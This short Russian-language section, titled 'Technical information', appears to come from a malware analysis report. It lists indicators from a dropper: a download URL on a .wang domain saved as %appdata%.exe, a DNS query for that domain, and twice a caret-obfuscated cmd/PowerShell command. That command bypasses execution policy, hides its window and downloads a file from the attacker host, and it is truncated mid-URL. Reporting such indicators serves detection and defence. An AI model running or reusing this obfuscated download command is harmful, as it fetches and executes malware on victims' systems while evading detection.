Техническая информация
- http://transporingsytw.wang/search.php как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /c "POW^ERsH^el^l.e^xE ^-ExEcUtIoNPoL^I^cY^ BY^Pa^s^s -^n^O^pRo^FI^le^ ^-W^IN^DOw^stY^LE ^HI^Dd^e^N^ (^neW-^O^Bj^ecT^ SYSTEM.^neT.^W^EB^CLI^Ent).DoWNlO^A^dFIle(^'http://transporin...
- DNS ASK tr#####ringsytw.wang
- '<SYSTEM32>\cmd.exe' /c "POW^ERsH^el^l.e^xE ^-ExEcUtIoNPoL^I^cY^ BY^Pa^s^s -^n^O^pRo^FI^le^ ^-W^IN^DOw^stY^LE ^HI^Dd^e^N^ (^neW-^O^Bj^ecT^ SYSTEM.^neT.^W^EB^CLI^Ent).DoWNlO^A^dFIle(^'http://transporin...' (со скрытым окном)